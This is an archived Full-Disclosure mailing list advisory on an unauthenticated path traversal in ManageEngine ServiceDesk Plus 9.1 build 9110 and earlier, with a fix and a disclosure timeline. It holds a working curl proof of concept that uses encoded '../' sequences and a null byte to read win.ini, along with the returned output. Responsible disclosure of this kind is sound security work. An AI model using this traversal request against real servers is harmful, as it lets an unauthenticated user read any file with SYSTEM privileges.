lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CALz0rM2TT48UaU-rAJxCtagaAeGj5_L3q2cfqLDfXL9SevnswA@mail.gmail.com>
Date: Sat, 3 Oct 2015 15:48:50 +0700
From: xistence <xistence@...0.nl>
To: fulldisclosure@...lists.org
Subject: [FD] ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path
	Traversal

Exploit Title: ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path
Traversal
Product: ManageEngine ServiceDesk Plus
Vulnerable Versions: 9.1 build 9110 and previous versions
Tested Version: 9.1 build 9110 (Windows)
Advisory Publication: 03/10/2015
Vulnerability Type: Unauthenticated Path Traversal
Credit: xistence <xistence[at]0x90.nl>

Product Description
-------------------

ServiceDesk Plus is an ITIL ready IT help desk software for organizations
of all sizes. With advanced ITSM functionality and easy-to-use capability,
ServiceDesk Plus helps IT support teams deliver world-class services to end
users with reduced costs and complexity. Over 100,000 organizations across
185 countries trust ServiceDesk Plus to optimize IT service desk
performance and achieve high user satisfaction.


Vulnerability Details
---------------------

The "fName" parameter is vulnerable to path traversal without the need for
any authentication.
On Windows environments, downloading files will be done with SYSTEM
privileges. This makes it possible to download any file on the filesystem.

The following example will download the "win.ini" file:

$ curl "
http://192.168.2.129:8080/workorder/FileDownload.jsp?module=support&fName=..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo


Solution
--------

Upgrade to ServiceDesk 9.1 build 9111.


Advisory Timeline
-----------------

07/10/2015 - Discovery and vendor notification
07/10/2015 - ManageEngine responsed that they will notify their development
team
09/13/2015 - No response from vendor yet, asked for status update
09/24/2015 - ManageEngine responded that they've fixed the issue and
assigned issue ID: SD-60283
09/28/2015 - Fixed ServiceDesk Plus version 9.1 build 9111 has been released
10/03/2015 - Public disclosure

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ